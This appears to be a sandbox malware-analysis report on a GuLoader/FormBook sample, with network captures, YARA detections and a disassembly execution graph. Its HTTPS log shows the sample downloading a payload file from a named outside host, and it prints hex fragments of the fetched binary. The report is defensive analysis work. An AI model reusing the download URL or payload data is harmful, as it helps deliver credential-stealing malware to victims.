                                          Jan 11, 2025 04:50:56.732609034 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.733124971 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.733253956 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.734116077 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.734167099 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.735061884 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.735110998 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.735850096 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.735896111 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.736032009 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.736079931 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.736975908 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.737023115 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.737895966 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.737946033 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.738821030 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.738869905 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.739643097 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.739691019 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.740592957 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.740638971 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.741012096 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.741059065 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.822355032 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.822422028 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.822453022 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.822498083 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.940850019 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.940928936 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.940934896 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.940958977 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.940987110 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.941005945 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.941195011 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.941299915 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.941450119 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.941493988 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.941591024 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.941636086 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.941818953 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.941865921 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.942037106 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.942082882 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.942225933 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.942284107 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.942399979 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.942450047 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.942452908 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.942461967 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.942480087 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.942497015 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.942502022 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.942528963 CET44349974122.201.127.17192.168.2.7
                                          Jan 11, 2025 04:50:56.942536116 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:56.942560911 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:57.700553894 CET49974443192.168.2.7122.201.127.17
                                          Jan 11, 2025 04:50:57.700588942 CET44349974122.201.127.17192.168.2.7

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jan 11, 2025 04:50:54.306457043 CET5076453192.168.2.71.1.1.1
                                          Jan 11, 2025 04:50:54.592953920 CET53507641.1.1.1192.168.2.7

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Jan 11, 2025 04:50:54.306457043 CET192.168.2.71.1.1.10x89c2Standard query (0)babalharra.com.auA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Jan 11, 2025 04:50:54.592953920 CET1.1.1.1192.168.2.70x89c2No error (0)babalharra.com.au122.201.127.17A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • babalharra.com.au

                                          HTTPS Proxied Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.749974122.201.127.174437756C:\Users\user\Desktop\Ntwph4urc1.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-11 03:50:55 UTC174OUTGET /yzSJO174.bin HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                          Host: babalharra.com.au
                                          Cache-Control: no-cache
                                          2025-01-11 03:50:56 UTC249INHTTP/1.1 200 OK
                                          Date: Sat, 11 Jan 2025 03:50:55 GMT
                                          Server: Apache
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Last-Modified: Tue, 03 Dec 2024 05:37:53 GMT
                                          Accept-Ranges: bytes
                                          Content-Length: 290368
                                          Content-Type: application/octet-stream
                                          2025-01-11 03:50:56 UTC7943INData Raw: 76 6f f3 7f 72 b1 9d b1 ec 9a 0c 04 d6 03 fa 78 d3 90 7a f2 1e 3b 83 6a 04 cf ff f8 18 4e 1b 13 73 59 ad 36 8f 23 0f 5d ec a8 17 c9 c9 45 94 fd e7 db 7d b1 c4 23 99 da 9e c2 cc 3b c8 d1 15 f7 a1 2c c5 39 64 e7 bf 9b 3f a1 5f d3 ff 0c 89 b0 ce 91 c7 c5 2a 0d 99 c8 6f 8d c6 3f c6 6f e0 87 f7 57 20 0d 13 0d f2 55 26 56 35 35 cb 2a 5b 4c 14 b6 d6 ad 73 3b 37 b2 31 2e ca 23 15 64 b4 87 55 e9 d2 78 d6 68 29 24 20 84 fa 9e b5 b2 e8 99 23 8a bf 38 72 3d 0b 10 09 c7 6d f7 27 92 c2 b1 af c1 23 ce 98 60 75 09 85 a2 a8 45 cf 01 0a 2d e6 bc bd 7c b1 0f d9 e5 fc 96 e1 45 f0 64 b9 df c2 5f db 25 66 70 02 32 b5 a3 75 bb 0b 04 22 f4 b8 01 63 94 86 ad 0e 8c 17 86 e6 dc eb b7 67 05 bb 5d 83 4c 6a 74 f7 ad 7c 0c 05 ef cb 55 b4 41 39 08 3a f9 55 df 12 29 97 15 71 05 a0 df ce
                                          Data Ascii: vorxz;jNsY6#]E}#;,9d?_*o?oW U&V55*[Ls;71.#dUxh)$ #8r=m'#`uE-|Ed_%fp2u"cg]Ljt|UA9:U)q
                                          2025-01-11 03:50:56 UTC8000INData Raw: 04 fa 02 b3 1c 6f 0a 56 23 f9 8a 67 d6 9e da ca 7c 87 29 d2 d8 73 00 a4 eb 29 b5 2e cb db 41 f6 ec 48 dc 7c 6f f9 cd 3b 44 a3 fc c0 97 25 54 ba 4a 2e 3c d5 8b de 1a 35 c5 69 8b b5 bb 87 b0 d4 ec 09 94 7c 9e eb 00 cc f1 86 6a db 5c 15 a8 34 d8 f3 31 08 c9 20 be 8d ba 9d 89 e4 6c 3d 51 3d b4 6c 14 f0 98 99 ca 62 1f d4 99 fc d7 6e c1 8e 7a 5f 15 54 c3 bc cd 07 cd 10 29 61 88 ee 6d 15 b5 6e 9d 2a a1 24 00 87 0e a5 3a a5 93 ff 1b 35 9c c6 f9 88 c5 c9 f1 95 59 00 fa ec 4f a6 2d 68 6e db 9a 36 22 cd 9a 6f 76 8b 76 8f eb ee 10 b4 48 b8 25 e1 b5 8d 6c cf a9 b3 89 16 6d 6e c9 61 7e 3e 62 ce 45 7d f4 da 88 61 60 3b fd fd 61 c6 d6 35 30 a8 47 34 74 81 80 ef 13 3f f6 1d c3 25 e9 e7 e6 8a e2 c7 6d 9b 11 f4 ac e2 69 04 44 4d c3 6a aa 91 cc 4a 54 a7 2a 07 da ca c3 38 e4
                                          Data Ascii: oV#g|)s).AH|o;D%TJ.<5i|j\41 l=Q=lbnz_T)amn*$:5YO-hn6"ovvH%lmna~>bE}a`;a50G4t?%miDMjJT*8
                                          2025-01-11 03:50:56 UTC8000INData Raw: 7e c9 cb 98 b4 d9 94 ac 19 9a 0a f4 82 9d 77 1c fe 40 da 2b 61 b5 0b 5d fd 99 11 ba d1 0d 48 63 84 f0 9f b3 26 2f 42 15 ad 7f 5d 4e 94 e9 2c e3 6b 32 42 c8 1d 05 68 b3 49 1a ec 03 56 f4 19 6a a8 6e 68 6e fd 2f 08 b5 07 52 8d cb 09 36 ec 25 3e 86 18 ac ba 4f 9f 62 a4 8b 01 d0 31 66 50 a2 6e 2e 7c 71 6a 6e b7 83 6a f8 36 ee a6 79 9e 91 2a f5 9e 8e 63 82 a1 16 d8 11 05 aa 8c 6c 20 3d e1 25 76 af e7 44 ed ff 2b 75 72 4a 50 42 0d 62 ae 19 3f 20 f7 b8 2b 47 ff 67 b9 36 68 de 3b 10 27 79 34 9c af dc 85 4d 6a 77 49 1e f7 1c 66 4f b0 62 6d 0e 9e cb da 39 67 e7 7c a0 54 9e ac 72 bf 69 1a c5 ba d4 c2 75 13 34 38 9a b9 fc 1d 07 b7 d1 49 a8 bd a7 47 19 27 30 93 b8 19 3d b4 1b b7 43 98 59 29 25 60 e3 4c cb 67 a2 82 91 cd 11 38 94 8a d2 0b 84 35 c0 12 bf 21 7f 50 13 ba
                                          Data Ascii: ~w@+a]Hc&/B]N,k2BhIVjnhn/R6%>Ob1fPn.|qjnj6y*cl =%vD+urJPBb? +Gg6h;'y4MjwIfObm9g|Triu48IG'0=CY)%`Lg85!P
                                          2025-01-11 03:50:56 UTC8000INData Raw: a5 66 36 e7 5f 0c 40 a1 1c 0e 91 9a bb 49 57 39 f5 4a 98 02 26 51 03 35 ad 65 ff 71 88 b0 63 48 27 d8 1b ab ae ef 43 33 c3 67 60 d8 d4 ba fb f5 04 01 62 23 8c 90 7a ca 22 08 c8 e2 55 ee 3e f5 86 5b 3b 46 4d a5 3f 52 a9 76 a5 11 58 b9 2d 67 27 dc cc d5 43 9c d4 34 8e 4e 52 4e 00 e0 ce fd bc de 60 84 63 4c 30 00 bc 67 47 f0 58 00 18 4f a0 95 44 a9 7b ac 57 b7 ee 31 fa 83 1f 2d 16 87 34 67 6a 80 a1 5f b4 1e 9f 58 5c d2 59 5f 05 87 bd 8b cc 34 16 2d 69 d3 41 72 e1 58 b8 34 23 17 4f 0d 92 0e 57 0f 9b f5 21 26 f0 a4 14 c9 8f a0 06 09 a1 c7 2b 6a 40 74 ea bc f0 87 2c 18 87 91 ee 73 28 d0 74 49 38 cc b9 96 59 bb 90 52 93 c9 e4 16 9a 1d 76 be cf fd 3c 90 8a d6 f5 6a 18 d6 af f5 ea 27 d8 f1 ba d4 42 3f 4a d6 6c dd c5 21 fa 62 11 4a ec f9 2f 11 2f 04 33 ef 48 83 b2
                                          Data Ascii: f6_@IW9J&Q5eqcH'C3g`b#z"U>[;FM?RvX-g'C4NRN`cL0gGXOD{W1-4gj_X\Y_4-iArX4#OW!&+j@t,s(tI8YRv<j'B?Jl!bJ//3H
                                          2025-01-11 03:50:56 UTC8000INData Raw: 22 4c 8e 09 26 10 67 5b d1 a5 7d d4 c9 15 65 a4 f5 da ad 5c 1d 82 3a 5f 7a 12 e1 92 c6 75 5e 1f ca 8f c6 42 08 4f 07 19 73 1a fa dc d8 63 a8 b7 3a 02 cf f4 e7 b2 80 5a 0a 5f 78 0b 33 c6 cb fa 06 ef 35 55 4b cb 86 b5 a7 ea 54 96 51 4f ea 07 8e dd 31 5d f7 2f 50 fc f2 53 fd 91 e9 44 dc 10 1c 06 4a e4 fb d1 a8 e4 4f d4 79 ec 2f 7b 18 04 ad d8 d6 c0 5c d0 af 66 a3 f5 ac 08 a6 92 ef 0d af 75 b3 17 53 bd 89 15 07 da 6b 43 a8 05 c3 56 70 17 7c 36 c9 e9 92 90 2f 20 75 01 42 b2 bd 0e f6 ce 3f cb 20 d7 22 e7 6c b3 25 3d 26 57 ae e2 37 21 eb 8e be 69 6e 18 e9 db fc ac 1b 22 c4 25 eb ea c9 64 b0 37 13 ac 96 76 2e 90 fb 16 79 c0 6b 1e 43 1c 73 7a 98 f7 c5 96 70 01 1d ea 29 69 e0 55 51 32 f1 a7 af 92 18 9c 43 fc a9 bb 4e 39 b3 45 6f 88 40 d4 7e 2d 11 cc 1d 12 56 9a ab
                                          Data Ascii: "L&g[}e\:_zu^BOsc:Z_x35UKTQO1]/PSDJOy/{\fuSkCVp|6/ uB? "l%=&W7!in"%d7v.ykCszp)iUQ2CN9Eo@~-V
                                          2025-01-11 03:50:56 UTC8000INData Raw: 38 f0 8f cd ae 2f bd ab 42 8a 1b 73 af 35 5c 32 da 45 38 df f0 68 7a 1f 09 95 f0 10 3a c3 a7 92 7b a4 4a 11 5c 1e c3 9c 93 2b 13 b9 49 fa fd 48 25 49 d5 c0 d7 6f cf b6 87 00 a4 8c 03 25 f8 5e cd 62 6d 0d 04 95 09 67 dd 25 e2 2d 65 ef 43 e8 c3 e3 05 ab c0 91 d7 0c f9 55 fe 3c 07 ff ed ec fd 89 9a 43 21 b0 1e 40 79 80 04 fc 96 c3 76 53 99 18 ff cb 42 08 56 95 0a 5d 23 da 89 7c d8 85 ec 5e 57 04 41 a1 63 8c f6 ad 54 ba a3 98 4e ed 71 c7 19 d4 14 4a f1 4e 51 9d 80 69 1f 51 3e 92 89 c4 e2 55 7e e9 68 3c 38 cc e6 a1 e5 c9 e6 20 59 9c f6 2c 71 2c 45 c9 0c 11 dd fc fb 36 61 9a c1 aa c7 59 c4 d3 b8 11 01 14 1e 21 93 6b 59 f5 ca 0c d2 71 8c bb 86 9b b8 92 8e 7b 8c 46 31 c3 1b dc ed c2 a3 77 10 b3 6d b8 c5 e8 7b 1a 03 d3 ba a2 41 29 31 57 73 78 8d e0 e6 2e be 9f 2e
                                          Data Ascii: 8/Bs5\2E8hz:{J\+IH%Io%^bmg%-eCU<C!@yvSBV]#|^WAcTNqJNQiQ>U~h<8 Y,q,E6aY!kYq{F1wm{A)1Wsx..
                                          2025-01-11 03:50:56 UTC8000INData Raw: 2d db a1 cf e8 27 52 a8 9e c2 bf d4 0d 72 35 f9 3f 3f 9d b0 a2 06 dd 48 8e df 4a 36 ba 75 bb 68 7a ac 05 9e 74 7b b1 66 73 77 fd 59 fc a7 41 58 b5 80 06 8f 68 ee ef 7d 8b 9f 12 95 6c ef 13 6e 06 2c 99 e7 8f 31 d8 50 55 ad 21 b6 e6 42 44 67 92 bd a7 bd c7 b5 b4 ce 52 c1 e4 87 4a 25 63 dd 77 4c 35 57 7d fe f8 b1 d8 c4 ff e6 cf 27 e9 d9 6e 97 cd 40 b4 4d 5d 20 27 38 c7 1c 39 9c 1f 8a f1 31 c2 4c 33 ed 34 75 de c3 69 6c 4a 2d 92 c6 55 ad 82 28 f8 d5 8e a3 00 1f 05 a8 c2 b1 2d 3c 07 b3 9d 66 6d 46 e8 56 96 26 3c f9 08 68 00 1a df e6 85 33 bf a1 c0 ed 05 f5 1e 8b c8 a6 0d cf 74 49 3d 23 1b 0b b6 f5 63 8b 46 42 97 19 d1 90 6f 45 79 c3 d2 f3 a8 1b 9d 16 e3 2b ad 52 54 b0 63 2a 68 ea f6 42 9a 24 42 18 29 5c 13 48 3c 82 b3 2a ac b9 a8 cb 53 66 bc f2 4b 56 f2 04 8f
                                          Data Ascii: -'Rr5??HJ6uhzt{fswYAXh}ln,1PU!BDgRJ%cwL5W}'n@M] '891L34uilJ-U(-<fmFV&<h3tI=#cFBoEy+RTc*hB$B)\H<*SfKV
                                          2025-01-11 03:50:56 UTC8000INData Raw: 5f b1 cb e4 e4 ec 1f d4 f2 14 fc 03 72 33 23 6d c7 1d 1f 8d 43 3e 6b 75 b7 70 18 26 dd 74 f9 06 fa 42 df 81 7f bf 2a 7b 7e d7 08 a9 05 8d 85 b0 c2 ce 33 57 aa ae a5 e1 a6 30 92 03 90 68 f3 6c 83 4c 9b 07 ea b9 68 72 09 cf d1 ff 1b ac 87 8c 01 c5 97 53 a1 dc 78 63 9d 03 e9 31 e1 60 18 d2 20 fd 21 db 9f 39 83 8f 7a a0 3a 4b fe 9e 3f 16 de 9f 39 c2 48 3c e5 92 be 1e 98 6d 64 a0 23 7a b5 14 13 f3 d6 b8 f9 5c e7 b6 d7 b3 99 1b 65 ac 93 d9 6e f6 04 d6 42 a4 1e 9e 35 a9 8d 6d 31 94 fa 41 f7 ea a0 12 3b 29 0e 1b 6e ea 11 2f f3 18 bc 19 91 2b 8d 4a e7 6f 09 1b 50 37 65 75 f1 4c 0d ef af 56 6c 0e c5 db 6c e8 2c 02 be 09 a6 78 0e eb c4 e3 54 0a f6 ce 66 8f 96 93 b7 f8 19 cf 2c 67 2a 80 a4 e2 f5 27 4e 1e 68 ab a6 e5 8e f3 17 0b 16 83 24 63 60 af 12 67 fc 06 c1 48 ca
                                          Data Ascii: _r3#mC>kup&tB*{~3W0hlLhrSxc1` !9z:K?9H<md#z\enB5m1A;)n/+JoP7euLVll,xTf,g*'Nh$c`gH
                                          2025-01-11 03:50:56 UTC8000INData Raw: 87 db ca 1b 32 e7 a3 83 93 8f 81 1b 34 80 61 f8 68 ec be 56 3c e8 ec 78 97 05 20 82 2d 33 bb be ba e7 24 e2 af c2 7e ba 92 a2 b7 8c 49 b7 80 19 f8 82 fe 36 60 a3 b8 7c 87 96 d4 5c 2a 36 2d cf 30 b2 78 d6 04 08 f1 88 26 bb 4b e3 45 9b f9 b6 c5 7a ca df e7 d3 1b 92 65 c2 2a 98 55 b6 7d ba b9 56 43 d9 fb 3e f9 a8 df c9 08 1c 40 08 15 76 ce ea 50 fc 46 db 07 94 f9 dd d8 bf 81 32 74 49 c0 c6 83 10 cc b7 12 af 36 dd 0d 50 41 98 84 b2 ec b1 f5 8a 73 e1 8b ee 82 a5 74 ca e0 c1 79 1b 59 02 73 49 64 d7 2e 2e a2 da e6 a9 a3 80 8f 71 c7 32 07 a4 c7 42 3d 39 f5 fe 64 6b 8f eb 30 f3 e6 9f 05 4d 40 14 58 9e a3 ec bf 09 b5 3d 72 39 c1 8c 5e 56 0f 17 11 dc 45 1d a3 93 7c 54 8d a7 6e 9b 4f f6 b9 78 ac d7 ae d4 d8 f8 8b 3d ce f9 14 54 9a ab 6a c9 8b d6 40 99 de 30 24 b9 9c
                                          Data Ascii: 24ahV<x -3$~I6`|\*6-0x&KEze*U}VC>@vPF2tI6PAstyYsId..q2B=9dk0M@X=r9^VE|TnOx=Tj@0$
                                          2025-01-11 03:50:56 UTC8000INData Raw: 74 d0 2c 83 02 12 a0 ba 49 fb f3 cb 17 c2 34 e8 79 77 71 3a 3e 8c 73 3c 7f d3 8a 8a 76 16 4c f4 47 5e 41 51 36 fe 1f 4b be 71 ad 64 26 77 30 1d 75 a9 b6 04 c9 11 19 ac ca c8 69 08 8f 65 36 20 01 62 a1 fd 1f 57 0a ef 4c d6 c3 4a 52 bb d0 6a 15 56 4d 9a 73 c6 aa f9 d0 fd 96 b7 63 e7 e6 fd 0d 8f 8e 9d 0a 96 5f 7e e7 d6 d1 05 b3 bb cb ca 4f bd 19 61 6b ab bf a4 f0 e9 17 35 3f 0b ff 64 77 fe dd af 6b ca 06 ca 2b 60 fc df 36 c6 a9 db d8 b2 b2 d4 3a cf bc 5a 85 af 46 d3 01 a8 98 d1 54 43 bc fe 3b d5 36 e3 2f 64 c0 e6 67 cf e9 bd 18 5b 7c 28 7b ed 88 66 8f 11 a8 d4 06 16 50 9d c5 cd 79 9a 12 03 76 70 ba d8 d1 e8 81 de 25 84 46 1b 00 70 39 bb 40 e6 82 9c 1e b7 e8 b5 0f f4 5e 68 cf af cc db f1 4e 7e ab 56 34 f0 e7 00 8d d8 15 a3 0e 40 5e ef 1b 33 7e 8c 67 bb 0a 49
                                          Data Ascii: t,I4ywq:>s<vLG^AQ6Kqd&w0uie6 bWLJRjVMsc_~Oak5?dwk+`6:ZFTC;6/dg[|({fPyvp%Fp9@^hN~V4@^3~gI


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:5
                                          Start time:22:49:36
                                          Start date:10/01/2025
                                          Path:C:\Users\user\Desktop\Ntwph4urc1.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Ntwph4urc1.exe"
                                          Imagebase:0x400000
                                          File size:437'610 bytes
                                          MD5 hash:C57DA1BB37A79E6F05722518DBADB3CE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1847253587.000000000507C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:9
                                          Start time:00:39:31
                                          Start date:11/01/2025
                                          Path:C:\Users\user\Desktop\Ntwph4urc1.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Ntwph4urc1.exe"
                                          Imagebase:0x400000
                                          File size:437'610 bytes
                                          MD5 hash:C57DA1BB37A79E6F05722518DBADB3CE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2644641710.00000000365B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:18.7%
                                            Dynamic/Decrypted Code Coverage:13.6%
                                            Signature Coverage:15.9%
                                            Total number of Nodes:1580
                                            Total number of Limit Nodes:32
                                            execution_graph 4024 401941 4025 401943 4024->4025 4030 402d3e 4025->4030 4031 402d4a 4030->4031 4075 40642b 4031->4075 4034 401948 4036 405b00 4034->4036 4117 405dcb 4036->4117 4039 405b28 DeleteFileW 4041 401951 4039->4041 4040 405b3f 4042 405c6a 4040->4042 4131 4063ee lstrcpynW 4040->4131 4042->4041 4160 40674c FindFirstFileW 4042->4160 4044 405b65 4045 405b78 4044->4045 4046 405b6b lstrcatW 4044->4046 4132 405d0f lstrlenW 4045->4132 4047 405b7e 4046->4047 4051 405b8e lstrcatW 4047->4051 4053 405b99 lstrlenW FindFirstFileW 4047->4053 4051->4053 4052 405c88 4163 405cc3 lstrlenW CharPrevW 4052->4163 4054 405c5f 4053->4054 4056 405bbb 4053->4056 4054->4042 4058 405c42 FindNextFileW 4056->4058 4068 405b00 60 API calls 4056->4068 4070 405456 24 API calls 4056->4070 4136 4063ee lstrcpynW 4056->4136 4137 405ab8 4056->4137 4145 405456 4056->4145 4156 4061b4 MoveFileExW 4056->4156 4058->4056 4062 405c58 FindClose 4058->4062 4059 405ab8 5 API calls 4061 405c9a 4059->4061 4063 405cb4 4061->4063 4064 405c9e 4061->4064 4062->4054 4066 405456 24 API calls 4063->4066 4064->4041 4067 405456 24 API calls 4064->4067 4066->4041 4069 405cab 4067->4069 4068->4056 4071 4061b4 36 API calls 4069->4071 4070->4058 4073 405cb2 4071->4073 4073->4041 4077 406438 4075->4077 4076 406683 4078 402d6b 4076->4078 4108 4063ee lstrcpynW 4076->4108 4077->4076 4080 406651 lstrlenW 4077->4080 4081 40642b 10 API calls 4077->4081 4084 406566 GetSystemDirectoryW 4077->4084 4086 406579 GetWindowsDirectoryW 4077->4086 4087 40669d 5 API calls 4077->4087 4088 40642b 10 API calls 4077->4088 4089 4065f4 lstrcatW 4077->4089 4090 4065ad SHGetSpecialFolderLocation 4077->4090 4101 4062bc 4077->4101 4106 406335 wsprintfW 4077->4106 4107 4063ee lstrcpynW 4077->4107 4078->4034 4092 40669d 4078->4092 4080->4077 4081->4080 4084->4077 4086->4077 4087->4077 4088->4077 4089->4077 4090->4077 4091 4065c5 SHGetPathFromIDListW CoTaskMemFree 4090->4091 4091->4077 4098 4066aa 4092->4098 4093 406720 4094 406725 CharPrevW 4093->4094 4096 406746 4093->4096 4094->4093 4095 406713 CharNextW 4095->4093 4095->4098 4096->4034 4098->4093 4098->4095 4099 4066ff CharNextW 4098->4099 4100 40670e CharNextW 4098->4100 4113 405cf0 4098->4113 4099->4098 4100->4095 4109 40625b 4101->4109 4104 4062f0 RegQueryValueExW RegCloseKey 4105 406320 4104->4105 4105->4077 4106->4077 4107->4077 4108->4078 4110 40626a 4109->4110 4111 406273 RegOpenKeyExW 4110->4111 4112 40626e 4110->4112 4111->4112 4112->4104 4112->4105 4114 405cf6 4113->4114 4115 405d0c 4114->4115 4116 405cfd CharNextW 4114->4116 4115->4098 4116->4114 4166 4063ee lstrcpynW 4117->4166 4119 405ddc 4167 405d6e CharNextW CharNextW 4119->4167 4122 405b20 4122->4039 4122->4040 4123 40669d 5 API calls 4129 405df2 4123->4129 4124 405e23 lstrlenW 4125 405e2e 4124->4125 4124->4129 4126 405cc3 3 API calls 4125->4126 4128 405e33 GetFileAttributesW 4126->4128 4127 40674c 2 API calls 4127->4129 4128->4122 4129->4122 4129->4124 4129->4127 4130 405d0f 2 API calls 4129->4130 4130->4124 4131->4044 4133 405d1d 4132->4133 4134 405d23 CharPrevW 4133->4134 4135 405d2f 4133->4135 4134->4133 4134->4135 4135->4047 4136->4056 4173 405ebf GetFileAttributesW 4137->4173 4140 405ae5 4140->4056 4141 405ad3 RemoveDirectoryW 4143 405ae1 4141->4143 4142 405adb DeleteFileW 4142->4143 4143->4140 4144 405af1 SetFileAttributesW 4143->4144 4144->4140 4146 405471 4145->4146 4154 405513 4145->4154 4147 40548d lstrlenW 4146->4147 4148 40642b 17 API calls 4146->4148 4149 4054b6 4147->4149 4150 40549b lstrlenW 4147->4150 4148->4147 4152 4054c9 4149->4152 4153 4054bc SetWindowTextW 4149->4153 4151 4054ad lstrcatW 4150->4151 4150->4154 4151->4149 4152->4154 4155 4054cf SendMessageW SendMessageW SendMessageW 4152->4155 4153->4152 4154->4056 4155->4154 4157 4061d5 4156->4157 4158 4061c8 4156->4158 4157->4056 4176 40603a 4158->4176 4161 406762 FindClose 4160->4161 4162 405c84 4160->4162 4161->4162 4162->4041 4162->4052 4164 405c8e 4163->4164 4165 405cdf lstrcatW 4163->4165 4164->4059 4165->4164 4166->4119 4168 405d8b 4167->4168 4169 405d9d 4167->4169 4168->4169 4170 405d98 CharNextW 4168->4170 4171 405cf0 CharNextW 4169->4171 4172 405dc1 4169->4172 4170->4172 4171->4169 4172->4122 4172->4123 4174 405ed1 SetFileAttributesW 4173->4174 4175 405ac4 4173->4175 4174->4175 4175->4140 4175->4141 4175->4142 4177 406090 GetShortPathNameW 4176->4177 4178 40606a 4176->4178 4180 4060a5 4177->4180 4181 4061af 4177->4181 4203 405ee4 GetFileAttributesW CreateFileW 4178->4203 4180->4181 4183 4060ad wsprintfA 4180->4183 4181->4157 4182 406074 CloseHandle GetShortPathNameW 4182->4181 4184 406088 4182->4184 4185 40642b 17 API calls 4183->4185 4184->4177 4184->4181 4186 4060d5 4185->4186 4204 405ee4 GetFileAttributesW CreateFileW 4186->4204 4188 4060e2 4188->4181 4189 4060f1 GetFileSize GlobalAlloc 4188->4189 4190 406113 4189->4190 4191 4061a8 CloseHandle 4189->4191 4205 405f67 ReadFile 4190->4205 4191->4181 4196 406132 lstrcpyA 4199 406154 4196->4199 4197 406146 4198 405e49 4 API calls 4197->4198 4198->4199 4200 40618b SetFilePointer 4199->4200 4212 405f96 WriteFile 4200->4212 4203->4182 4204->4188 4206 405f85 4205->4206 4206->4191 4207 405e49 lstrlenA 4206->4207 4208 405e8a lstrlenA 4207->4208 4209 405e92 4208->4209 4210 405e63 lstrcmpiA 4208->4210 4209->4196 4209->4197 4210->4209 4211 405e81 CharNextA 4210->4211 4211->4208 4213 405fb4 GlobalFree 4212->4213 4213->4191 4214 4015c1 4215 402d3e 17 API calls 4214->4215 4216 4015c8 4215->4216 4217 405d6e 4 API calls 4216->4217 4229 4015d1 4217->4229 4218 401631 4220 401663 4218->4220 4221 401636 4218->4221 4219 405cf0 CharNextW 4219->4229 4223 401423 24 API calls 4220->4223 4241 401423 4221->4241 4230 40165b 4223->4230 4228 40164a SetCurrentDirectoryW 4228->4230 